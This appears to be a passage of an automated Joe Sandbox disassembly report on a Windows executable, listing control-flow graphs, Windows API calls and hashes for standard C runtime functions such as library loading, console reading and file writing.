                                                                                                                                                                                                                                        • Instruction ID: a52c8f269c2cf8dbbd00dbdfe628e83ab6ab9805d7d8e9247629aaccce02eb56
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f846e89b939f9fac9fcc4162ed96f5c8dfcdcd3e6ac35b0fe50633cd49c887cb
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5041E534E002049BCF10DF69C885AAEBFB1BF45318F1081ABED145B392D7799E0ACB95
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                        control_flow_graph 1377 4dbc53-4dbc63 call 452f36 1380 4dbc69-4dbc6b 1377->1380 1381 4dbd57 1377->1381 1382 4dbc6d-4dbc74 1380->1382 1383 4dbc7a-4dbc97 call 453972 1380->1383 1385 4dbd5d-4dbdb2 call 45368e 1381->1385 1382->1381 1382->1383 1383->1385 1389 4dbc9d-4dbcbd GetModuleFileNameW 1383->1389 1390 4dbcbf-4dbcd0 call 453972 1389->1390 1391 4dbcd6 1389->1391 1390->1385 1390->1391 1393 4dbcd9-4dbce2 1391->1393 1393->1393 1395 4dbce4-4dbcee 1393->1395 1396 4dbd11-4dbd2c call 452c11 1395->1396 1397 4dbcf0-4dbd0f call 455af6 1395->1397 1396->1385 1402 4dbd2e-4dbd3e call 452c11 1396->1402 1397->1385 1397->1396 1402->1385 1405 4dbd40-4dbd56 call 451a69 1402->1405
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • GetModuleFileNameW.KERNEL32(00000000,00560B32,00000104), ref: 004DBCB0
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2129715506.0000000000460000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129698467.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129715506.0000000000451000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129715506.000000000045C000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129715506.0000000000503000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129816930.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129837394.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129866299.0000000000553000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129899709.000000000055D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129916941.0000000000562000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129916941.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_450000_file.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: FileModuleName
                                                                                                                                                                                                                                        • String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program:
                                                                                                                                                                                                                                        • API String ID: 514040917-4022980321
                                                                                                                                                                                                                                        • Opcode ID: 4a30802c04841df2a83abd15dbcf2685ff6c1fa128fd34a144bf2a4650462620
                                                                                                                                                                                                                                        • Instruction ID: a1ed0363b521de17523a71cefa98b2a298d0b48522f4eb6ce8ce0f2dc6653505
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 4a30802c04841df2a83abd15dbcf2685ff6c1fa128fd34a144bf2a4650462620
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: FB214F72A40301B6D63016565C6AE9B2B9DEB93788F05002BFD44933D2F7DDDA44C1E9
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                        control_flow_graph 1436 4dd781-4dd7be GetModuleHandleExW 1437 4dd7e1-4dd7e5 1436->1437 1438 4dd7c0-4dd7d2 GetProcAddress 1436->1438 1440 4dd7e7-4dd7ea FreeLibrary 1437->1440 1441 4dd7f0-4dd7fd 1437->1441 1438->1437 1439 4dd7d4-4dd7df 1438->1439 1439->1437 1440->1441
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,87190059,?,?,00000000,00507477,000000FF,?,004DD6E4,?,?,004DD693,?), ref: 004DD7B6
                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 004DD7C8
                                                                                                                                                                                                                                        • FreeLibrary.KERNEL32(00000000,?,?,00000000,00507477,000000FF,?,004DD6E4,?,?,004DD693,?), ref: 004DD7EA
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2129715506.0000000000460000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129698467.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129715506.0000000000451000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129715506.000000000045C000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129715506.0000000000503000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129816930.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129837394.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129866299.0000000000553000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129899709.000000000055D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129916941.0000000000562000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129916941.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_450000_file.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                                                        • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                                                        • API String ID: 4061214504-1276376045
                                                                                                                                                                                                                                        • Opcode ID: bf74ed68e0683a89b9dd9985ad32ec1e3a2d8293ca8db7447632a70393a6cbfa
                                                                                                                                                                                                                                        • Instruction ID: 630a2a2e5f5d1a717ffd2899a0b5a6bd650e4c8af26128a50991dd5562e7f835
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: bf74ed68e0683a89b9dd9985ad32ec1e3a2d8293ca8db7447632a70393a6cbfa
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8C01A232944659AFDB118F54CC49FAEBBB8FB04B25F000626E811A23D0DBB49944DA50
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                        control_flow_graph 1443 4e56c9-4e56e0 LoadLibraryExW 1444 4e572a-4e572b 1443->1444 1445 4e56e2-4e56eb GetLastError 1443->1445 1446 4e56ed-4e5701 call 4555ec 1445->1446 1447 4e5728 1445->1447 1446->1447 1450 4e5703-4e5717 call 4555ec 1446->1450 1447->1444 1450->1447 1453 4e5719-4e5727 LoadLibraryExW 1450->1453
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • LoadLibraryExW.KERNEL32(?,00000000,00000800,?,004E5665), ref: 004E56D8
                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,004E5665), ref: 004E56E2
                                                                                                                                                                                                                                        • LoadLibraryExW.KERNEL32(?,00000000,00000000), ref: 004E5720
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2129715506.0000000000460000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129698467.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129715506.0000000000451000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129715506.000000000045C000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129715506.0000000000503000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129816930.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129837394.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129866299.0000000000553000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129899709.000000000055D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129916941.0000000000562000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129916941.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_450000_file.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: LibraryLoad$ErrorLast
                                                                                                                                                                                                                                        • String ID: api-ms-$ext-ms-
                                                                                                                                                                                                                                        • API String ID: 3177248105-537541572
                                                                                                                                                                                                                                        • Opcode ID: e6d7f8ae55f9f14624db16b1c92e0dd632cf59a3220b6726c9ebf202ba135f04
                                                                                                                                                                                                                                        • Instruction ID: c3df2c325f9ec109208cc3adb756868acbbd1c003e7f06cae0587d1efaa9fea2
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e6d7f8ae55f9f14624db16b1c92e0dd632cf59a3220b6726c9ebf202ba135f04
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 92F0AE70780704F7EB201B52EC07B593E959B10796F104022FD4CA51D1E7B6D964D558
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                        control_flow_graph 1454 4ea988-4ea998 1455 4ea99a-4ea9ad call 451893 call 453a26 1454->1455 1456 4ea9b2-4ea9b4 1454->1456 1473 4ead20 1455->1473 1458 4ea9ba-4ea9c0 1456->1458 1459 4ead08-4ead15 call 451893 call 453a26 1456->1459 1458->1459 1462 4ea9c6-4ea9f2 1458->1462 1478 4ead1b call 4537d3 1459->1478 1462->1459 1465 4ea9f8-4eaa01 1462->1465 1468 4eaa1b-4eaa1d 1465->1468 1469 4eaa03-4eaa16 call 451893 call 453a26 1465->1469 1471 4ead04-4ead06 1468->1471 1472 4eaa23-4eaa27 1468->1472 1469->1478 1476 4ead23-4ead26 1471->1476 1472->1471 1477 4eaa2d-4eaa31 1472->1477 1473->1476 1477->1469 1481 4eaa33-4eaa4a 1477->1481 1478->1473 1483 4eaa8f-4eaa95 1481->1483 1484 4eaa4c-4eaa4f 1481->1484 1485 4eaa66-4eaa7d call 451893 call 453a26 call 4537d3 1483->1485 1486 4eaa97-4eaa9e 1483->1486 1487 4eaa5e-4eaa64 1484->1487 1488 4eaa51-4eaa59 1484->1488 1517 4eac3b 1485->1517 1489 4eaaa2-4eaac0 call 45407f call 456366 * 2 1486->1489 1490 4eaaa0 1486->1490 1487->1485 1492 4eaa82-4eaa8d 1487->1492 1491 4eab0f-4eab22 1488->1491 1528 4eaadd-4eab05 call 45196a 1489->1528 1529 4eaac2-4eaad8 call 453a26 call 451893 1489->1529 1490->1489 1496 4eabde-4eabe7 call 4566b8 1491->1496 1497 4eab28-4eab34 1491->1497 1494 4eab0c 1492->1494 1494->1491 1508 4eac58 1496->1508 1509 4eabe9-4eabfb 1496->1509 1497->1496 1501 4eab3a-4eab3c 1497->1501 1501->1496 1505 4eab42-4eab63 1501->1505 1505->1496 1511 4eab65-4eab7b 1505->1511 1513 4eac5c-4eac72 ReadFile 1508->1513 1509->1508 1514 4eabfd-4eac0c GetConsoleMode 1509->1514 1511->1496 1516 4eab7d-4eab7f 1511->1516 1518 4eac74-4eac7a 1513->1518 1519 4eacd0-4eacdb GetLastError 1513->1519 1514->1508 1520 4eac0e-4eac12 1514->1520 1516->1496 1522 4eab81-4eaba4 1516->1522 1527 4eac3e-4eac48 call 456366 1517->1527 1518->1519 1525 4eac7c 1518->1525 1523 4eacdd-4eacef call 453a26 call 451893 1519->1523 1524 4eacf4-4eacf7 1519->1524 1520->1513 1526 4eac14-4eac2c ReadConsoleW 1520->1526 1522->1496 1530 4eaba6-4eabbc 1522->1530 1523->1517 1536 4eacfd-4eacff 1524->1536 1537 4eac34-4eac3a call 454b42 1524->1537 1533 4eac7f-4eac91 1525->1533 1534 4eac2e GetLastError 1526->1534 1535 4eac4d-4eac56 1526->1535 1527->1476 1528->1494 1529->1517 1530->1496 1540 4eabbe-4eabc0 1530->1540 1533->1527 1543 4eac93-4eac97 1533->1543 1534->1537 1535->1533 1536->1527 1537->1517 1540->1496 1547 4eabc2-4eabd9 1540->1547 1550 4eac99-4eaca9 call 4ea5ea 1543->1550 1551 4eacb0-4eacbd 1543->1551 1547->1496 1562 4eacac-4eacae 1550->1562 1556 4eacbf call 4ea796 1551->1556 1557 4eacc9-4eacce call 4ea35f 1551->1557 1563 4eacc4-4eacc7 1556->1563 1557->1563 1562->1527 1563->1562
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2129715506.0000000000460000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129698467.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129715506.0000000000451000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129715506.000000000045C000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129715506.0000000000503000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129816930.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129837394.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129866299.0000000000553000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129899709.000000000055D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129916941.0000000000562000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129916941.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_450000_file.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: ecd86a08fdebb5a0c375ac67f0d1ce005660ca64ef0dc88090b660ce2f8646ae
                                                                                                                                                                                                                                        • Instruction ID: 9f67985be35edbd09baeef51ac45c99575f7f162d1157d8c77509c755dd7ff32
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ecd86a08fdebb5a0c375ac67f0d1ce005660ca64ef0dc88090b660ce2f8646ae
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6EB15E70E04289AFDB11DF9AC880B7E7BB1FF45306F14415AE90097392C778AD56DB2A
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • __getptd.LIBCMT ref: 00539C55
                                                                                                                                                                                                                                          • Part of subcall function 00539E2C: __getptd_noexit.LIBCMT ref: 00539E2F
                                                                                                                                                                                                                                          • Part of subcall function 00539E2C: __amsg_exit.LIBCMT ref: 00539E3C
                                                                                                                                                                                                                                        • __getptd.LIBCMT ref: 00539C6C
                                                                                                                                                                                                                                        • __amsg_exit.LIBCMT ref: 00539C7A
                                                                                                                                                                                                                                        • __lock.LIBCMT ref: 00539C8A
                                                                                                                                                                                                                                        • __updatetlocinfoEx_nolock.LIBCMT ref: 00539C9E
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2129837394.000000000051F000.00000004.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129698467.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129715506.0000000000451000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129715506.000000000045C000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129715506.0000000000460000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129715506.0000000000503000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129816930.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129866299.0000000000553000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129899709.000000000055D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129916941.0000000000562000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129916941.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_450000_file.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 938513278-0
                                                                                                                                                                                                                                        • Opcode ID: 14d360ddc5f5134c6b4350502512b9c4de46fda78e3925e90e5399c2ca0cd54f
                                                                                                                                                                                                                                        • Instruction ID: e8aed6441f031a4c07fa1ca4c961029c9d67b4a9d92b609dcf4cd84669e7387e
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 14d360ddc5f5134c6b4350502512b9c4de46fda78e3925e90e5399c2ca0cd54f
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E0F096B19057169ADB25BBB8980B79E7FE0BFC0720F101259F0405B1D2CFB45D41D659
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • LoadLibraryExW.KERNEL32(?,00000000,00000800,?,004A7B1C), ref: 004A7D17
                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,004A7B1C), ref: 004A7D21
                                                                                                                                                                                                                                        • LoadLibraryExW.KERNEL32(?,00000000,00000000), ref: 004A7D49
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2129715506.0000000000460000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129698467.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129715506.0000000000451000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129715506.000000000045C000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129715506.0000000000503000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129816930.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129837394.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129866299.0000000000553000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129899709.000000000055D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129916941.0000000000562000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129916941.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_450000_file.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: LibraryLoad$ErrorLast
                                                                                                                                                                                                                                        • String ID: api-ms-
                                                                                                                                                                                                                                        • API String ID: 3177248105-2084034818
                                                                                                                                                                                                                                        • Opcode ID: 07ec884d25f8022af0f9ae05513fbf5eccc35e850112c7b41e317b93d34cf20b
                                                                                                                                                                                                                                        • Instruction ID: 825857783a70bc40ee723fc9807177485b069bf5f8b6ea94bce939fed2f9e967
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 07ec884d25f8022af0f9ae05513fbf5eccc35e850112c7b41e317b93d34cf20b
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A4E0D830344208B7EF201B50DC0AB693F59AF20B50F104022FA0DE40F0D7B6D854D948
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • GetConsoleOutputCP.KERNEL32(87190059), ref: 004E7FFC
                                                                                                                                                                                                                                        • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 004E8257
                                                                                                                                                                                                                                        • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 004E829F
                                                                                                                                                                                                                                        • GetLastError.KERNEL32 ref: 004E8342
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2129715506.0000000000460000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129698467.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129715506.0000000000451000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129715506.000000000045C000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129715506.0000000000503000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129816930.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129837394.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129866299.0000000000553000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129899709.000000000055D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129916941.0000000000562000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129916941.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_450000_file.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: FileWrite$ConsoleErrorLastOutput
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 2718003287-0
                                                                                                                                                                                                                                        • Opcode ID: a7aaf374b15013a43678ad1cc501ac73e668af155dfe7a7187276eae88928500
                                                                                                                                                                                                                                        • Instruction ID: 14292cd49913457e0d99e526e0bb8349f73801b9219ce5881fa5fb927687c407
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a7aaf374b15013a43678ad1cc501ac73e668af155dfe7a7187276eae88928500
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: CED17875D006989FCF11CFA9D8809AEBBB4FF09305F18416EE81AEB351DB34A846CB54
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • GetEnvironmentStringsW.KERNEL32 ref: 004EF9A8
                                                                                                                                                                                                                                        • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 004EF9E0
                                                                                                                                                                                                                                        • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 004EFA00
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2129715506.0000000000460000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129698467.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129715506.0000000000451000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129715506.000000000045C000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129715506.0000000000503000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129816930.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129837394.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129866299.0000000000553000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129899709.000000000055D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129916941.0000000000562000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129916941.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_450000_file.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: EnvironmentStrings$Free
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 3328510275-0
                                                                                                                                                                                                                                        • Opcode ID: 4559acc6bf7d8a9ef1d0685a7281ac7364523589f271ddd24eb675fedd29e5ff
                                                                                                                                                                                                                                        • Instruction ID: 50a70cac12083e4d1c488bcb0f3b76658c34b60eb8585d27b252e7ae72160aef
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 4559acc6bf7d8a9ef1d0685a7281ac7364523589f271ddd24eb675fedd29e5ff
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0C1148B1502509BFA61127B75CC9C7F295CDF9639A710003AFD05C6202FB7CCD09917A
                                                                                                                                                                                                                                        Uniqueness

